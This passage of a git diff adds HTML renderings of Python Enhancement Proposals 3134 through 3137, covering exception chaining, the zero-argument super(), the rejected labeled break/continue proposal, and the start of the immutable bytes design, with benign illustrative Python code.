As for other languages, Java and Ruby both discard the original exception when +another exception occurs in a catch/rescue or finally/ensure +clause. Perl 5 lacks built-in structured exception handling. For Perl 6, RFC +number 88 [9] proposes an exception mechanism that implicitly retains chained +exceptions in an array named @@. In that RFC, the most recently raised +exception is exposed for matching, as in this PEP; also, arbitrary expressions +(possibly involving @@) can be evaluated for exception matching.

+

Exceptions in C# contain a read-only InnerException property that may point +to another exception. Its documentation [10] says that “When an exception X +is thrown as a direct result of a previous exception Y, the InnerException +property of X should contain a reference to Y.” This property is not set by +the VM automatically; rather, all exception constructors take an optional +innerException argument to set it explicitly. The __cause__ attribute +fulfills the same purpose as InnerException, but this PEP proposes a new +form of raise rather than extending the constructors of all exceptions. C# +also provides a GetBaseException method that jumps directly to the end of +the InnerException chain; this PEP proposes no analog.

+

The reason all three of these attributes are presented together in one proposal +is that the __traceback__ attribute provides convenient access to the +traceback on chained exceptions.

+
+
+

Implicit Exception Chaining

+

Here is an example to illustrate the __context__ attribute:

+
def compute(a, b):
+    try:
+        a/b
+    except Exception, exc:
+        log(exc)
+
+def log(exc):
+    file = open('logfile.txt')  # oops, forgot the 'w'
+    print >>file, exc
+    file.close()
+
+
+

Calling compute(0, 0) causes a ZeroDivisionError. The compute() +function catches this exception and calls log(exc), but the log() +function also raises an exception when it tries to write to a file that wasn’t +opened for writing.

+

In today’s Python, the caller of compute() gets thrown an IOError. The +ZeroDivisionError is lost. With the proposed change, the instance of +IOError has an additional __context__ attribute that retains the +ZeroDivisionError.

+

The following more elaborate example demonstrates the handling of a mixture of +finally and except clauses:

+
def main(filename):
+    file = open(filename)       # oops, forgot the 'w'
+    try:
+        try:
+            compute()
+        except Exception, exc:
+            log(file, exc)
+    finally:
+        file.clos()             # oops, misspelled 'close'
+
+def compute():
+    1/0
+
+def log(file, exc):
+    try:
+        print >>file, exc       # oops, file is not writable
+    except:
+        display(exc)
+
+def display(exc):
+    print ex                    # oops, misspelled 'exc'
+
+
+

Calling main() with the name of an existing file will trigger four +exceptions. The ultimate result will be an AttributeError due to the +misspelling of clos, whose __context__ points to a NameError due +to the misspelling of ex, whose __context__ points to an IOError +due to the file being read-only, whose __context__ points to a +ZeroDivisionError, whose __context__ attribute is None.

+

The proposed semantics are as follows:

+
    +
  1. Each thread has an exception context initially set to None.
  2. +
  3. Whenever an exception is raised, if the exception instance does not already +have a __context__ attribute, the interpreter sets it equal to the +thread’s exception context.
  4. +
  5. Immediately after an exception is raised, the thread’s exception context is +set to the exception.
  6. +
  7. Whenever the interpreter exits an except block by reaching the end or +executing a return, yield, continue, or break statement, the +thread’s exception context is set to None.
  8. +
+
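
These semantics match what Python 3 eventually shipped; a minimal check:

+
try:
+    try:
+        1 / 0
+    except ZeroDivisionError:
+        raise KeyError('oops')       # raised while handling the first
+except KeyError as exc:
+    # The secondary exception retains the original implicitly:
+    assert isinstance(exc.__context__, ZeroDivisionError)
+    assert exc.__cause__ is None     # no explicit 'raise ... from'
+
+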
+
+

Explicit Exception Chaining

+

The __cause__ attribute on exception objects is always initialized to +None. It is set by a new form of the raise statement:

+
raise EXCEPTION from CAUSE
+
+
+

which is equivalent to:

+
exc = EXCEPTION
+exc.__cause__ = CAUSE
+raise exc
+
+
+

In the following example, a database provides implementations for a few +different kinds of storage, with file storage as one kind. The database +designer wants errors to propagate as DatabaseError objects so that the +client doesn’t have to be aware of the storage-specific details, but doesn’t +want to lose the underlying error information.

+
class DatabaseError(Exception):
+    pass
+
+class FileDatabase(Database):
+    def __init__(self, filename):
+        try:
+            self.file = open(filename)
+        except IOError, exc:
+            raise DatabaseError('failed to open') from exc
+
+
+

If the call to open() raises an exception, the problem will be reported as +a DatabaseError, with a __cause__ attribute that reveals the +IOError as the original cause.
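
+

The chain is then visible to the caller; a sketch in Python 3 syntax as shipped, assuming the FileDatabase class above rewritten with the except ... as spelling:

+
try:
+    FileDatabase('no-such-file')
+except DatabaseError as exc:
+    # The original error from open() survives on the new exception:
+    assert isinstance(exc.__cause__, IOError)
+
+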

+
+
+

Traceback Attribute

+

The following example illustrates the __traceback__ attribute.

+
def do_logged(file, work):
+    try:
+        work()
+    except Exception, exc:
+        write_exception(file, exc)
+        raise exc
+
+from traceback import format_tb
+
+def write_exception(file, exc):
+    ...
+    type = exc.__class__
+    message = str(exc)
+    lines = format_tb(exc.__traceback__)
+    file.write(... type ... message ... lines ...)
+    ...
+
+
+

In today’s Python, the do_logged() function would have to extract the +traceback from sys.exc_traceback or sys.exc_info() [2] and pass both +the value and the traceback to write_exception(). With the proposed +change, write_exception() simply gets one argument and obtains the +exception using the __traceback__ attribute.

+

The proposed semantics are as follows:

+
    +
  1. Whenever an exception is caught, if the exception instance does not already +have a __traceback__ attribute, the interpreter sets it to the newly +caught traceback.
  2. +
+
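
This attribute shipped in Python 3 essentially as proposed; a minimal check:

+
from traceback import format_tb
+
+try:
+    1 / 0
+except ZeroDivisionError as exc:
+    lines = format_tb(exc.__traceback__)   # no sys.exc_info() needed
+    assert lines                           # at least one formatted frame
+
+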
+
+

Enhanced Reporting

+

The default exception handler will be modified to report chained exceptions. +The chain of exceptions is traversed by following the __cause__ and +__context__ attributes, with __cause__ taking priority. In keeping +with the chronological order of tracebacks, the most recently raised exception +is displayed last; that is, the display begins with the description of the +innermost exception and backs up the chain to the outermost exception. The +tracebacks are formatted as usual, with one of the lines:

+
The above exception was the direct cause of the following exception:
+
+
+

or

+
During handling of the above exception, another exception occurred:
+
+
+

between tracebacks, depending on whether they are linked by __cause__ or +__context__ respectively. Here is a sketch of the procedure:

+
def print_chain(exc):
+    if exc.__cause__:
+        print_chain(exc.__cause__)
+        print '\nThe above exception was the direct cause...'
+    elif exc.__context__:
+        print_chain(exc.__context__)
+        print '\nDuring handling of the above exception, ...'
+    print_exc(exc)
+
+
+

In the traceback module, the format_exception, print_exception, +print_exc, and print_last functions will be updated to accept an +optional chain argument, True by default. When this argument is +True, these functions will format or display the entire chain of exceptions +as just described. When it is False, these functions will format or +display only the outermost exception.
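
+

The chain argument did land in Python 3’s traceback module; for example:

+
import traceback
+
+try:
+    try:
+        1 / 0
+    except ZeroDivisionError:
+        raise KeyError('oops')
+except KeyError:
+    traceback.print_exc(chain=False)   # report only the KeyError
+
+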

+

The cgitb module should also be updated to display the entire chain of +exceptions.

+
+
+

C API

+

The PyErr_Set* calls for setting exceptions will not set the +__context__ attribute on exceptions. PyErr_NormalizeException will +always set the traceback attribute to its tb argument and the +__context__ and __cause__ attributes to None.

+

A new API function, PyErr_SetContext(context), will help C programmers +provide chained exception information. This function will first normalize the +current exception so it is an instance, then set its __context__ attribute. +A similar API function, PyErr_SetCause(cause), will set the __cause__ +attribute.

+
+
+

Compatibility

+

Chained exceptions expose the type of the most recent exception, so they will +still match the same except clauses as they do now.

+

The proposed changes should not break any code unless it sets or uses +attributes named __context__, __cause__, or __traceback__ on +exception instances. As of 2005-05-12, the Python standard library contains no +mention of such attributes.

+
+
+

Open Issue: Extra Information

+

Walter Dörwald [11] expressed a desire to attach extra information to an +exception during its upward propagation without changing its type. This could +be a useful feature, but it is not addressed by this PEP. It could conceivably +be addressed by a separate PEP establishing conventions for other informational +attributes on exceptions.

+
+
+

Open Issue: Suppressing Context

+

As written, this PEP makes it impossible to suppress __context__, since +setting exc.__context__ to None in an except or finally clause +will only result in it being set again when exc is raised.

+
+
+

Open Issue: Limiting Exception Types

+

To improve encapsulation, library implementors may want to wrap all +implementation-level exceptions with an application-level exception. One could +try to wrap exceptions by writing this:

+
try:
+    ... implementation may raise an exception ...
+except:
+    import sys
+    raise ApplicationError from sys.exc_value
+
+
+

or this:

+
try:
+    ... implementation may raise an exception ...
+except Exception, exc:
+    raise ApplicationError from exc
+
+
+

but both are somewhat flawed. It would be nice to be able to name the current +exception in a catch-all except clause, but that isn’t addressed here. +Such a feature would allow something like this:

+
try:
+    ... implementation may raise an exception ...
+except *, exc:
+    raise ApplicationError from exc
+
+
+
+
+

Open Issue: yield

+

The exception context is lost when a yield statement is executed; resuming +the frame after the yield does not restore the context. Addressing this +problem is out of the scope of this PEP; it is not a new problem, as +demonstrated by the following example:

+
 >>> def gen():
+ ...     try:
+ ...         1/0
+ ...     except:
+ ...         yield 3
+ ...         raise
+ ...
+ >>> g = gen()
+ >>> g.next()
+ 3
+ >>> g.next()
+TypeError: exceptions must be classes, instances, or strings
+(deprecated), not NoneType
+
+
+
+
+

Open Issue: Garbage Collection

+

The strongest objection to this proposal has been that it creates cycles +between exceptions and stack frames [12]. Collection of cyclic garbage (and +therefore resource release) can be greatly delayed.

+
>>> try:
+>>>     1/0
+>>> except Exception, err:
+>>>     pass
+
+
+

will introduce a cycle from err -> traceback -> stack frame -> err, keeping all +locals in the same scope alive until the next GC happens.

+

Today, these locals would go out of scope. There is a lot of code which assumes that “local” resources – particularly open files – will be closed quickly. If closure has to wait for the next GC, a program (which runs fine today) may run out of file handles.

+

Making the __traceback__ attribute a weak reference would avoid the +problems with cyclic garbage. Unfortunately, it would make saving the +Exception for later (as unittest does) more awkward, and it would not +allow as much cleanup of the sys module.

+

A possible alternate solution, suggested by Adam Olsen, would be to instead +turn the reference from the stack frame to the err variable into a weak +reference when the variable goes out of scope [13].
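As a historical note, Python 3 sidestepped the common case by making the except target ephemeral: PEP 3110 specifies that the bound name is implicitly deleted when the handler block ends, which breaks the frame -> err -> traceback -> frame cycle for code like the example above:

try:
    1 / 0
except Exception as err:
    pass
# The handler ends with an implicit "del err", so the frame no longer
# references the exception (and, through its __traceback__, itself):
assert 'err' not in vars()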

+
+
+

Possible Future Compatible Changes

+

These changes are consistent with the appearance of exceptions as a single +object rather than a triple at the interpreter level.

+
    +
  • If PEP 340 or PEP 343 is accepted, replace the three (type, value, +traceback) arguments to __exit__ with a single exception argument.
  • +
  • Deprecate sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info() in favour of a single member, sys.exception.
  • +
  • Deprecate sys.last_type, sys.last_value, and sys.last_traceback +in favour of a single member, sys.last_exception.
  • +
  • Deprecate the three-argument form of the raise statement in favour of the +one-argument form.
  • +
  • Upgrade cgitb.html() to accept a single value as its first argument as an +alternative to a (type, value, traceback) tuple.
  • +
+
+
+

Possible Future Incompatible Changes

+

These changes might be worth considering for Python 3000.

+
    +
  • Remove sys.exc_type, sys.exc_value, sys.exc_traceback, and +sys.exc_info().
  • +
  • Remove sys.last_type, sys.last_value, and sys.last_traceback.
  • +
  • Replace the three-argument sys.excepthook with a one-argument API, and change the cgitb module to match.
  • +
  • Remove the three-argument form of the raise statement.
  • +
  • Upgrade traceback.print_exception to accept an exception argument +instead of the type, value, and traceback arguments.
  • +
+
+
+

Implementation

+

The __traceback__ and __cause__ attributes and the new raise syntax +were implemented in revision 57783 [14].

+
+
+

Acknowledgements

+

Brett Cannon, Greg Ewing, Guido van Rossum, Jeremy Hylton, Phillip J. Eby, +Raymond Hettinger, Walter Dörwald, and others.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3134.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3135/index.html new file mode 100644 index 00000000000..4a465c57193 --- /dev/null +++ b/pep-3135/index.html @@ -0,0 +1,361 @@ + PEP 3135 – New Super | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3135 – New Super

+
+
Author:
+
Calvin Spealman <ironfroggy at gmail.com>, +Tim Delaney <timothy.c.delaney at gmail.com>, +Lie Ryan <lie.1296 at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
28-Apr-2007
+
Python-Version:
+
3.0
+
Post-History:
+
28-Apr-2007, +29-Apr-2007, +29-Apr-2007, +14-May-2007, +12-Mar-2009
+
+
+
+
Table of Contents +
+
+

Numbering Note

+

This PEP started its life as PEP 367. Since it is now targeted +for Python 3000, it has been moved into the 3xxx space.

+
+
+

Abstract

+

This PEP proposes syntactic sugar for the super type: it automatically constructs super instances bound to the class in which a method was defined and to the instance (or class object, for classmethods) upon which the method is currently acting.

+

The premise of the new super usage suggested is as follows:

+
super().foo(1, 2)
+
+
+

to replace the old:

+
super(Foo, self).foo(1, 2)
+
+
+
+
+

Rationale

+

The current usage of super requires an explicit passing of both the class and +instance it must operate from, requiring a breaking of the DRY (Don’t Repeat +Yourself) rule. This hinders any change in class name, and is often considered +a wart by many.

+
+
+

Specification

+

Within the specification section, some special terminology will be used to +distinguish similar and closely related concepts. “super class” will refer to +the actual builtin class named “super”. A “super instance” is simply an +instance of the super class, which is associated with another class and +possibly with an instance of that class.

+

The new super semantics are only available in Python 3.0.

+

Replacing the old usage of super, calls to the next class in the MRO (method +resolution order) can be made without explicitly passing the class object +(although doing so will still be supported). Every function +will have a cell named __class__ that contains the class object that the +function is defined in.

+

The new syntax:

+
super()
+
+
+

is equivalent to:

+
super(__class__, <firstarg>)
+
+
+

where __class__ is the class that the method was defined in, and <firstarg> is the first parameter of the method (normally self for instance methods, and cls for class methods). For functions defined outside a class body, __class__ is not defined, and using the new syntax will result in a runtime SystemError.

+

While super is not a reserved word, the parser recognizes the use +of super in a method definition and only passes in the +__class__ cell when this is found. Thus, calling a global alias +of super without arguments will not necessarily work.
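For illustration, a minimal example of the adopted behaviour, including the global-alias caveat described above:

class Base:
    def greet(self):
        return 'Base'

class Derived(Base):
    def greet(self):
        # the compiler sees the name "super" and supplies the __class__ cell
        return 'Derived -> ' + super().greet()

assert Derived().greet() == 'Derived -> Base'

my_super = super    # a global alias

class Aliased(Base):
    def greet(self):
        return my_super().greet()   # no "super" in the source: no __class__ cell

try:
    Aliased().greet()
except RuntimeError:
    pass    # CPython raises "super(): __class__ cell not found"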

+
+
+

Closed Issues

+
+

Determining the class object to use

+

The class object is taken from a cell named __class__.

+
+
+

Should super actually become a keyword?

+

No. It is not necessary for super to become a keyword.

+
+
+

super used with __call__ attributes

+

It was considered that instantiating super instances the classic way might be a problem: calling the resulting instance would look up the __call__ attribute and thus try to perform an automatic super lookup to the next class in the MRO. However, this turned out to be false, because calling an object only looks up the __call__ method directly on the object’s type. The following example shows this in action.

+
class A(object):
+    def __call__(self):
+        return '__call__'
+    def __getattribute__(self, attr):
+        if attr == '__call__':
+            return lambda: '__getattribute__'
+a = A()
+assert a() == '__call__'
+assert a.__call__() == '__getattribute__'
+
+
+

In any case, this issue goes away entirely because classic calls to +super(<class>, <instance>) are still supported with the same meaning.

+
+
+
+

Alternative Proposals

+
+

No Changes

+

Although it’s always attractive to just keep things how they are, people have sought a change in how super is called for some time, and for good reasons, all mentioned previously:

+
    +
  • Decoupling from the class name (which might not even be bound to the +right class anymore!)
  • +
  • Simpler looking, cleaner super calls would be better
  • +
+
+
+

Dynamic attribute on super type

+

The proposal adds a dynamic attribute lookup to the super type, which will +automatically determine the proper class and instance parameters. Each super +attribute lookup identifies these parameters and performs the super lookup on +the instance, as the current super implementation does with the explicit +invocation of a super instance upon a class and instance.

+

This proposal relies on sys._getframe(), which is not appropriate for anything +except a prototype implementation.

+
+
+

self.__super__.foo(*args)

+

The __super__ attribute is mentioned in this PEP in several places, and could be a candidate for the complete solution, actually using it explicitly instead of any super usage directly. However, double-underscore names are usually an internal detail, and are best kept out of everyday code.

+
+
+

super(self, *args) or __super__(self, *args)

+

This solution only solves the problem of the type indication, does not handle differently named super methods, and is explicit about the name of the instance. It is less flexible because it cannot be applied to other method names in cases where that is needed. One use case where this fails is a base class with a factory classmethod and a subclass with two factory classmethods, both of which need to make proper super calls to the one in the base class.

+
+
+

super.foo(self, *args)

+

This variation actually eliminates the problems with locating the proper +instance, and if any of the alternatives were pushed into the spotlight, I +would want it to be this one.

+
+
+

super(*p, **kw)

+

There has been the proposal that directly calling super(*p, **kw) would +be equivalent to calling the method on the super object with the same name +as the method currently being executed i.e. the following two methods would be +equivalent:

+
def f(self, *p, **kw):
+    super.f(*p, **kw)
+
+
+
def f(self, *p, **kw):
+    super(*p, **kw)
+
+
+

There is strong sentiment for and against this, but implementation and style +concerns are obvious. Guido has suggested that this should be excluded from +this PEP on the principle of KISS (Keep It Simple Stupid).

+
+
+
+

History

+
+
29-Apr-2007
    +
  • Changed title from “Super As A Keyword” to “New Super”
  • +
  • Updated much of the language and added a terminology section +for clarification in confusing places.
  • +
  • Added reference implementation and history sections.
  • +
+
+
06-May-2007
    +
  • Updated by Tim Delaney to reflect discussions on the python-3000 +and python-dev mailing lists.
  • +
+
+
12-Mar-2009
    +
  • Updated to reflect the current state of implementation.
  • +
+
+
+
+
+

References

+

[1] Fixing super anyone? + (https://mail.python.org/pipermail/python-3000/2007-April/006667.html)

+

[2] PEP 3130: Access to Module/Class/Function Currently Being Defined (this) + (https://mail.python.org/pipermail/python-ideas/2007-April/000542.html)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3135.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3136/index.html new file mode 100644 index 00000000000..f53fdbf5a50 --- /dev/null +++ b/pep-3136/index.html @@ -0,0 +1,566 @@ + PEP 3136 – Labeled break and continue | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3136 – Labeled break and continue

+
+
Author:
+
Matt Chisholm <matt-python at theory.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
30-Jun-2007
+
Python-Version:
+
3.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This PEP is rejected. +See https://mail.python.org/pipermail/python-3000/2007-July/008663.html.

+
+
+

Abstract

+

This PEP proposes support for labels in Python’s break and +continue statements. It is inspired by labeled break and +continue in other languages, and the author’s own infrequent but +persistent need for such a feature.

+
+
+

Introduction

+

The break statement allows the programmer to terminate a loop +early, and the continue statement allows the programmer to move to +the next iteration of a loop early. In Python currently, break +and continue can apply only to the innermost enclosing loop.

+

Adding support for labels to the break and continue statements +is a logical extension to the existing behavior of the break and +continue statements. Labeled break and continue can +improve the readability and flexibility of complex code which uses +nested loops.

+

For brevity’s sake, the examples and discussion in this PEP usually +refers to the break statement. However, all of the examples and +motivations apply equally to labeled continue.

+
+
+

Motivation

+

If the programmer wishes to move to the next iteration of an outer enclosing loop, or to terminate multiple loops at once, he or she has a few less-than-elegant options.

+

Here’s one common way of imitating labeled break in Python (For +this and future examples, ... denotes an arbitrary number of +intervening lines of code):

+
for a in a_list:
+    time_to_break_out_of_a = False
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a, b):
+            break
+        ...
+        if condition_two(a, b):
+            time_to_break_out_of_a = True
+            break
+        ...
+    if time_to_break_out_of_a:
+        break
+    ...
+
+
+

This requires five lines and an extra variable, +time_to_break_out_of_a, to keep track of when to break out of the +outer (a) loop. And those five lines are spread across many lines of +code, making the control flow difficult to understand.

+

This technique is also error-prone. A programmer modifying this code +might inadvertently put new code after the end of the inner (b) loop +but before the test for time_to_break_out_of_a, instead of after +the test. This means that code which should have been skipped by +breaking out of the outer loop gets executed incorrectly.

+

This could also be written with an exception. The programmer would +declare a special exception, wrap the inner loop in a try, and catch +the exception and break when you see it:

+
class BreakOutOfALoop(Exception): pass
+
+for a in a_list:
+    ...
+    try:
+        for b in b_list:
+            ...
+            if condition_one(a, b):
+                break
+            ...
+            if condition_two(a, b):
+                raise BreakOutOfALoop
+            ...
+    except BreakOutOfALoop:
+        break
+    ...
+
+
+

Again, though, this requires five lines and a new, single-purpose exception class (instead of a new variable), and spreads basic control flow out over many lines. And it breaks out of the inner loop with break and out of the outer loop with an exception, which is inelegant. [1]

+

This next strategy might be the most elegant solution, assuming +condition_two() is inexpensive to compute:

+
for a in a_list:
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a, b):
+            break
+        ...
+        if condition_two(a, b):
+            break
+        ...
+    if condition_two(a, b):
+        break
+    ...
+
+
+

Breaking twice is still inelegant. This implementation also relies on +the fact that the inner (b) loop bleeds b into the outer for loop, +which (although explicitly supported) is both surprising to novices, +and in my opinion counter-intuitive and poor practice.

+

The programmer must also still remember to put in both breaks on +condition two and not insert code before the second break. A single +conceptual action, breaking out of both loops on condition_two(), +requires four lines of code at two indentation levels, possibly +separated by many intervening lines at the end of the inner (b) loop.
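(For comparison, and not part of this PEP: a common workaround is to extract the loops into a function, where return exits all of them at once. A sketch, with the condition functions passed in as parameters since they are only placeholders in the examples above:)

def scan(a_list, b_list, condition_one, condition_two):
    for a in a_list:
        for b in b_list:
            if condition_one(a, b):
                break              # leaves only the inner (b) loop
            if condition_two(a, b):
                return (a, b)      # "return" exits both loops at once
    return None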

+
+

Other languages

+

Now, put aside whatever dislike you may have for other programming +languages, and consider the syntax of labeled break and +continue. In Perl:

+
ALOOP: foreach $a (@a_array){
+    ...
+    BLOOP: foreach $b (@b_array){
+        ...
+        if (condition_one($a,$b)){
+            last BLOOP; # same as plain old last;
+        }
+        ...
+        if (condition_two($a,$b)){
+            last ALOOP;
+        }
+        ...
+    }
+    ...
+}
+
+
+

(Notes: Perl uses last instead of break. The BLOOP labels +could be omitted; last and continue apply to the innermost +loop by default.)

+

PHP uses a number denoting the number of loops to break out of, rather +than a label:

+
foreach ($a_array as $a){
+    ....
+    foreach ($b_array as $b){
+        ....
+        if (condition_one($a, $b)){
+            break 1;  # same as plain old break
+        }
+        ....
+        if (condition_two($a, $b)){
+            break 2;
+        }
+        ....
+    }
+    ...
+}
+
+
+

C/C++, Java, and Ruby all have similar constructions.

+

The control flow regarding when to break out of the outer (a) loop is +fully encapsulated in the break statement which gets executed when +the break condition is satisfied. The depth of the break statement +does not matter. Control flow is not spread out. No extra variables, +exceptions, or re-checking or storing of control conditions is +required. There is no danger that code will get inadvertently +inserted after the end of the inner (b) loop and before the break +condition is re-checked inside the outer (a) loop. These are the +benefits that labeled break and continue would bring to +Python.

+
+
+
+

What this PEP is not

+

This PEP is not a proposal to add GOTO to Python. GOTO allows a +programmer to jump to an arbitrary block or line of code, and +generally makes control flow more difficult to follow. Although +break and continue (with or without support for labels) can be +considered a type of GOTO, it is much more restricted. Another Python +construct, yield, could also be considered a form of GOTO – an +even less restrictive one. The goal of this PEP is to propose an +extension to the existing control flow tools break and +continue, to make control flow easier to understand, not more +difficult.

+

Labeled break and continue cannot transfer control to another +function or method. They cannot even transfer control to an arbitrary +line of code in the current scope. Currently, they can only affect +the behavior of a loop, and are quite different and much more +restricted than GOTO. This extension allows them to affect any +enclosing loop in the current name-space, but it does not change their +behavior to that of GOTO.

+
+
+

Specification

+

Under all of these proposals, break and continue by themselves +will continue to behave as they currently do, applying to the +innermost loop by default.

+
+

Proposal A - Explicit labels

+

The for and while loop syntax will be followed by an optional as +or label (contextual) keyword [2] and then an identifier, +which may be used to identify the loop out of which to break (or which +should be continued).

+

The break (and continue) statements will be followed by an +optional identifier that refers to the loop out of which to break (or +which should be continued). Here is an example using the as +keyword:

+
for a in a_list as a_loop:
+    ...
+    for b in b_list as b_loop:
+        ...
+        if condition_one(a, b):
+            break b_loop  # same as plain old break
+        ...
+        if condition_two(a, b):
+            break a_loop
+        ...
+    ...
+
+
+

Or, with label instead of as:

+
for a in a_list label a_loop:
+    ...
+    for b in b_list label b_loop:
+        ...
+        if condition_one(a, b):
+            break b_loop  # same as plain old break
+        ...
+        if condition_two(a, b):
+            break a_loop
+        ...
+    ...
+
+
+

This has all the benefits outlined above. It requires modifications to the language syntax: the syntax of the break and continue statements and of the for and while statements. It requires either a new contextual keyword label or an extension to the contextual keyword as. [3] It is unlikely to require any changes to existing Python programs. Passing an identifier not defined in the local scope to break or continue would raise a NameError.

+
+
+

Proposal B - Numeric break & continue

+

Rather than altering the syntax of for and while loops, +break and continue would take a numeric argument denoting the +enclosing loop which is being controlled, similar to PHP.

+

It seems more Pythonic to me for break and continue to refer +to loops indexing from zero, as opposed to indexing from one as PHP +does.

+
for a in a_list:
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a,b):
+            break 0  # same as plain old break
+        ...
+        if condition_two(a,b):
+            break 1
+        ...
+    ...
+
+
+

Passing a number that is too large, less than zero, or not an integer to break or continue would (probably) raise an IndexError.

+

This proposal would not require any changes to existing Python +programs.

+
+
+

Proposal C - The reduplicative method

+

The syntax of break and continue would be altered to allow +multiple break and continue statements on the same line. Thus, +break break would break out of the first and second enclosing +loops.

+
for a in a_list:
+    ...
+    for b in b_list:
+        ...
+        if condition_one(a,b):
+            break  # plain old break
+        ...
+        if condition_two(a,b):
+            break break
+        ...
+    ...
+
+
+

This would also allow the programmer to break out of the inner loop +and continue the next outermost simply by writing break continue, +[4] and so on. I’m not sure what exception would be +raised if the programmer used more break or continue +statements than existing loops (perhaps a SyntaxError?).

+

I expect this proposal to get rejected because it will be judged too +difficult to understand.

+

This proposal would not require any changes to existing Python +programs.

+
+
+

Proposal D - Explicit iterators

+

Rather than embellishing for and while loop syntax with labels, the +programmer wishing to use labeled breaks would be required to create +the iterator explicitly and assign it to an identifier if he or she +wanted to break out of or continue that loop from within a +deeper loop.

+
a_iter = iter(a_list)
+for a in a_iter:
+    ...
+    b_iter = iter(b_list)
+    for b in b_iter:
+        ...
+        if condition_one(a,b):
+            break b_iter  # same as plain old break
+        ...
+        if condition_two(a,b):
+            break a_iter
+        ...
+    ...
+
+
+

Passing a non-iterator object to break or continue would raise +a TypeError; and a nonexistent identifier would raise a NameError. +This proposal requires only one extra line to create a labeled loop, +and no extra lines to break out of a containing loop, and no changes +to existing Python programs.

+
+
+

Proposal E - Explicit iterators and iterator methods

+

This is a variant of Proposal D. Iterators would need to be created explicitly if anything other than the most basic use of break and continue was required. Instead of modifying the syntax of break and continue, .break() and .continue() methods could be added to the Iterator type.

+
a_iter = iter(a_list)
+for a in a_iter:
+    ...
+    b_iter = iter(b_list)
+    for b in b_iter:
+        ...
+        if condition_one(a,b):
+            b_iter.break()  # same as plain old break
+        ...
+        if condition_two(a,b):
+            a_iter.break()
+        ...
+    ...
+
+
+

I expect that this proposal will get rejected on the grounds of sheer +ugliness. However, it requires no changes to the language syntax +whatsoever, nor does it require any changes to existing Python +programs.

+
+
+
+

Implementation

+

I have never looked at the Python language implementation itself, so I +have no idea how difficult this would be to implement. If this PEP is +accepted, but no one is available to write the feature, I will try to +implement it myself.

+
+
+

Footnotes

+ +
+
+

Resources

+

This issue has come up before, although it has never been resolved, to +my knowledge.

+
    +
  • labeled breaks, on comp.lang.python, in the context of +do...while loops
  • +
  • break LABEL vs. exceptions + PROPOSAL, on python-list, as +compared to using Exceptions for flow control
  • +
  • Named code blocks on python-list, a suggestion motivated by the +desire for labeled break / continue
  • +
  • mod_python bug fix An example of someone setting a flag inside +an inner loop that triggers a continue in the containing loop, to +work around the absence of labeled break and continue
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3136.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-3137/index.html new file mode 100644 index 00000000000..6bd3e148060 --- /dev/null +++ b/pep-3137/index.html @@ -0,0 +1,417 @@ + PEP 3137 – Immutable Bytes and Mutable Buffer | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3137 – Immutable Bytes and Mutable Buffer

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Sep-2007
+
Python-Version:
+
3.0
+
Post-History:
+
26-Sep-2007, 30-Sep-2007
+
+
+
+
Table of Contents +
+
+

Introduction

+

After releasing Python 3.0a1 with a mutable bytes type, pressure +mounted to add a way to represent immutable bytes. Gregory P. Smith +proposed a patch that would allow making a bytes object temporarily +immutable by requesting that the data be locked using the new buffer +API from PEP 3118. This did not seem the right approach to me.

+

Jeffrey Yasskin, with the help of Adam Hupp, then prepared a patch to +make the bytes type immutable (by crudely removing all mutating APIs) +and fix the fall-out in the test suite. This showed that there aren’t +all that many places that depend on the mutability of bytes, with the +exception of code that builds up a return value from small pieces.

+

Thinking through the consequences, and noticing that using the array +module as an ersatz mutable bytes type is far from ideal, and +recalling a proposal put forward earlier by Talin, I floated the +suggestion to have both a mutable and an immutable bytes type. (This +had been brought up before, but until seeing the evidence of Jeffrey’s +patch I wasn’t open to the suggestion.)

+

Moreover, a possible implementation strategy became clear: use the old +PyString implementation, stripped down to remove locale support and +implicit conversions to/from Unicode, for the immutable bytes type, +and keep the new PyBytes implementation as the mutable bytes type.

+

The ensuing discussion made it clear that the idea is welcome but +needs to be specified more precisely. Hence this PEP.

+
+
+

Advantages

+

One advantage of having an immutable bytes type is that code objects +can use these. It also makes it possible to efficiently create hash +tables using bytes for keys; this may be useful when parsing protocols +like HTTP or SMTP which are based on bytes representing text.

+

Porting code that manipulates binary data (or encoded text) in Python +2.x will be easier using the new design than using the original 3.0 +design with mutable bytes; simply replace str with bytes and +change ‘…’ literals into b’…’ literals.

+
+
+

Naming

+

I propose the following type names at the Python level:

+
    +
  • bytes is an immutable array of bytes (PyString)
  • +
  • bytearray is a mutable array of bytes (PyBytes)
  • +
  • memoryview is a bytes view on another object (PyMemory)
  • +
+

The old type named buffer is so similar to the new type memoryview, introduced by PEP 3118, that it is redundant. The rest of this PEP doesn’t discuss the functionality of memoryview; it is just mentioned here to justify getting rid of the old buffer type. (An earlier version of this PEP proposed buffer as the new name for PyBytes; in the end this name was deemed too confusing given the many other uses of the word buffer.)

+

While eventually it makes sense to change the C API names, this PEP +maintains the old C API names, which should be familiar to all.

+
+

Summary

+

Here’s a simple ASCII-art table summarizing the type names in various +Python versions:

+
+--------------+-------------+------------+--------------------------+
+| C name       | 2.x    repr | 3.0a1 repr | 3.0a2               repr |
++--------------+-------------+------------+--------------------------+
+| PyUnicode    | unicode u'' | str     '' | str                   '' |
+| PyString     | str      '' | str8   s'' | bytes                b'' |
